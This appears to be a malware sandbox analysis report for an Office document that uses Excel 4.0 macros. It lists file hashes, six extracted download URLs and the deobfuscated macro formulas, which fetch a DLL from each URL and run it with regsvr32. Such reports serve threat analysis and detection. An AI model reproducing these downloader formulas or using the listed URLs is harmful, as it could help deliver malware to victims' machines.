Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
General
-
Target
?i=1pkhvtzys
-
Size
46KB
-
MD5
363495acb4327435709de91edaef8338
-
SHA1
11ea485cddc9de2db0397f02f00a564a9468f032
-
SHA256
64d92f79a2d87571d428b7b19ef4f5c1680c24c8952a2f46b84f217cfba19766
-
SHA512
1502abfa4494c69541cbaf3f00b176f04a45802b35a0818f0a46cd229a99dd675a7b8746efa946ea37efd7305c18a00eaba4a48c251d19d084fcbf4e575cf10e
-
SSDEEP
768:cmBlntZhEI2YmxNskmoKjBvK3HqK88F/G6YzATUfJnXYS6oRM:dBlntTEvDLmXi3JvG6YzATOJnXYSXRM
Malware Config
Extracted
http://eles-tech.com/css/KzMysMqFMs/
http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/
https://txpcrescue.com/cgi-bin/5tSO8/
http://hadramout21.com/jetpack-temp/Py/
http://haribuilders.com/zoombox-master/4HYGX/
http://hansen-arnal.com/cp/iiTrAeEtvOwmjjekWgI/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://eles-tech.com/css/KzMysMqFMs/","..\xewn.dll",0,0) =IF('PIMKE'!C14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/","..\xewn.dll",0,0)) =IF('PIMKE'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://txpcrescue.com/cgi-bin/5tSO8/","..\xewn.dll",0,0)) =IF('PIMKE'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hadramout21.com/jetpack-temp/Py/","..\xewn.dll",0,0)) =IF('PIMKE'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://haribuilders.com/zoombox-master/4HYGX/","..\xewn.dll",0,0)) =IF('PIMKE'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hansen-arnal.com/cp/iiTrAeEtvOwmjjekWgI/","..\xewn.dll",0,0)) =IF('PIMKE'!C24<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll") =RETURN()
Signatures
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
Files
-
?i=1pkhvtzys